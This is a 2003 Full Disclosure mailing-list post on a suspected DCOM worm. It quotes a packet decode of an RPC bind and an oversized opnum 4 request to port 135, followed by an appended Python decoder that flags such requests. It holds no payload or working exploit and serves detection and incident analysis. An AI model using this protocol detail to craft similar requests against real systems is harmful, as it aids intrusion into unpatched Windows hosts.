Full Disclosure mailing list archives
RE: DCOM
From: "Jason Coombs" <jasonc () science org>
Date: Mon, 11 Aug 2003 10:17:11 -1000
Is this what you're seeing?
6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 8687500 microseconds
Frame: Frame number: 6
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0x1C04; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 7172 (0x1C04)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0138
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092873 (0xD3A96089)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xC46A
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 72 (0x48)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 0 (0x0)
MSRPC: Presentation Context List
MSRPC: Number of Context Elements = 1 (0x1)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Number of Transfer Syntaxs = 1 (0x1)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Abstract Interface Version = 0 (0x0)
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 7
Frame: Total frame length: 114 bytes
Frame: Capture frame length: 114 bytes
Frame: Frame data: Number of data bytes remaining = 114 (0x0072)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : BEFC20000500
ETHERNET: .......0 = Individual address
ETHERNET: ......1. = Locally administered address
ETHERNET: Source address : 000005000000
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 114 (0x0072)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064)
IP: ID = 0x1E94; Proto = TCP; Len: 100
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 100 (0x64)
IP: Identification = 7828 (0x1E94)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFBB3
IP: Source Address = 67.30.171.57
IP: Destination Address = 67.30.174.214
IP: Data: Number of data bytes remaining = 80 (0x0050)
TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088, src: 135 dst: 3843
TCP: Source Port = Location Service
TCP: Destination Port = 0x0F03
TCP: Sequence Number = 188699400 (0xB3F5308)
TCP: Acknowledgement Number = 3551092945 (0xD3A960D1)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8088 (0x1F98)
TCP: Checksum = 0xEDFA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 60 (0x003C)
MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind Ack
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 60 (0x3C)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 37081 (0x90D9)
MSRPC: Secondary Address
MSRPC: Secondary Address Length = 4 (0x4)
MSRPC: Secondary Address Port
MSRPC: Padding Byte(s)
MSRPC: Result List
MSRPC: Number of Results = 1 (0x1)
MSRPC: Reserved = 0 (0x0)
MSRPC: Reserved 2
MSRPC: Presentation Context Results
MSRPC: Result = Acceptance
MSRPC: Reason = Reason not specified
MSRPC: Transfer Syntax
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.827
Frame: Time delta from previous physical frame: 421875 microseconds
Frame: Frame number: 8
Frame: Total frame length: 1414 bytes
Frame: Capture frame length: 1414 bytes
Frame: Frame data: Number of data bytes remaining = 1414 (0x0586)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 1414 (0x0586)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578)
IP: ID = 0x1C05; Proto = TCP; Len: 1400
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 1400 (0x578)
IP: Identification = 7173 (0x1C05)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFC2E
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 1380 (0x0564)
TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092945 (0xD3A960D1)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0x9219
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 1360 (0x0550)
MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 1704 (0x6A8)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 229 (0xE5)
MSRPC: Bind Frame Number = 6 (0x6)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Allocation Hint = 1680 (0x690)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4)
MSRPC: Stub Data
9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.936
Frame: Time delta from previous physical frame: 109375 microseconds
Frame: Frame number: 9
Frame: Total frame length: 398 bytes
Frame: Capture frame length: 398 bytes
Frame: Frame data: Number of data bytes remaining = 398 (0x018E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 398 (0x018E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180)
IP: ID = 0x1C06; Proto = TCP; Len: 384
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 384 (0x180)
IP: Identification = 7174 (0x1C06)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0026
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 364 (0x016C)
TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551094305 (0xD3A96621)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xDBD3
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 344 (0x0158)
-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Paul Marsh
Sent: Monday, August 11, 2003 8:56 AM
To: Full-Disclosure (E-mail)
Subject: [Full-disclosure] DCOM
Looks like a worm has been released, check your logs.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
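As an added example, not part of Jason Coombs's post or the Network Monitor output above: a small Python decoder for the connection-oriented DCE/RPC Bind and Request PDUs that the capture decodes (frames 6 and 8), plus a check that ties a Request back to the interface its presentation context was bound to and notes when the fragment is larger than the TCP segment carrying it. The sample PDUs are rebuilt from the field values shown in the decode (little-endian NDR only, one context element, no object UUID); the Request's stub data is a constructed zero filler, not the captured payload.

```python
import struct
import uuid

# Interface and transfer-syntax UUIDs exactly as decoded in frames 6 and 7
ISYSTEMACTIVATOR = uuid.UUID("000001A0-0000-0000-C000-000000000046")
NDR_SYNTAX = uuid.UUID("8A885D04-1CEB-11C9-9FE8-08002B104860")
PTYPES = {0: "Request", 11: "Bind", 12: "Bind Ack"}
HDR = "<BBBB4sHHI"  # ver, minor, ptype, pflags, drep, frag_len, auth_len, call_id


def parse_pdu(data):
    """Decode the 16-byte common header and the Bind or Request body that follows."""
    if len(data) < 16:
        raise ValueError("PDU shorter than the common header")
    ver, minor, ptype, pflags, drep, frag_len, auth_len, call_id = struct.unpack_from(HDR, data, 0)
    if ver != 5 or not drep[0] & 0x10:  # only little-endian NDR is handled here
        raise ValueError("unsupported RPC version or data representation")
    pdu = {"type": PTYPES.get(ptype, f"type {ptype}"), "flags": pflags,
           "frag_len": frag_len, "call_id": call_id,
           "complete": frag_len <= len(data)}  # False when the PDU spans several segments
    if ptype == 11:  # Bind: negotiation parameters, then the first context element
        max_xmit, max_recv, assoc, n_ctx = struct.unpack_from("<HHIB3x", data, 16)
        ctx_id, n_syntax = struct.unpack_from("<HBx", data, 28)
        pdu.update(max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc, ctx_id=ctx_id,
                   abstract=uuid.UUID(bytes_le=data[32:48]),
                   abstract_ver=struct.unpack_from("<I", data, 48)[0],
                   transfer=uuid.UUID(bytes_le=data[52:68]),
                   transfer_ver=struct.unpack_from("<I", data, 68)[0])
    elif ptype == 0:  # Request: allocation hint, context id, opnum, then stub data
        alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", data, 16)
        pdu.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum, stub=data[24:])
    return pdu


def build_bind(call_id, abstract, transfer, max_frag=0x16D0):
    """Rebuild a Bind PDU from the field values shown in the capture (one context)."""
    body = struct.pack("<HHIB3x", max_frag, max_frag, 0, 1)
    body += struct.pack("<HBx", 1, 1) + abstract.bytes_le + struct.pack("<I", 0)
    body += transfer.bytes_le + struct.pack("<I", 2)  # NDR transfer syntax, version 2
    return struct.pack(HDR, 5, 0, 11, 3, b"\x10\x00\x00\x00", 16 + len(body), 0, call_id) + body


def build_request(call_id, ctx_id, opnum, frag_len, alloc_hint, segment_len):
    """Rebuild the first TCP segment of a Request whose fragment exceeds that segment.
    The stub bytes are a constructed placeholder, not the captured stub data."""
    hdr = struct.pack(HDR, 5, 0, 0, 3, b"\x10\x00\x00\x00", frag_len, 0, call_id)
    hdr += struct.pack("<IHH", alloc_hint, ctx_id, opnum)
    return hdr + b"\x00" * (segment_len - len(hdr))


def review_connection(segments):
    """Track Bind contexts on one connection and report Requests for opnum 4 on the
    ISystemActivator interface as (call_id, frag_len, complete) tuples."""
    contexts, findings = {}, []
    for seg in segments:
        pdu = parse_pdu(seg)
        if pdu["type"] == "Bind":
            contexts[pdu["ctx_id"]] = pdu["abstract"]
        elif (pdu["type"] == "Request" and pdu["opnum"] == 4
              and contexts.get(pdu["ctx_id"]) == ISYSTEMACTIVATOR):
            findings.append((pdu["call_id"], pdu["frag_len"], pdu["complete"]))
    return findings


# Constructed from the decoded values of frames 6 and 8: 72-byte Bind, 1360-byte first segment
SAMPLE_SEGMENTS = [build_bind(0x7F, ISYSTEMACTIVATOR, NDR_SYNTAX),
                   build_request(0xE5, 1, 4, 0x6A8, 0x690, 1360)]

if __name__ == "__main__":
    for seg in SAMPLE_SEGMENTS:
        print(parse_pdu(seg))
    print(review_connection(SAMPLE_SEGMENTS))
```

A fuller tracker would also confirm the Bind Ack result (Acceptance in frame 7) before trusting the context, and reassemble the remaining 344 bytes from frame 9 before inspecting the stub.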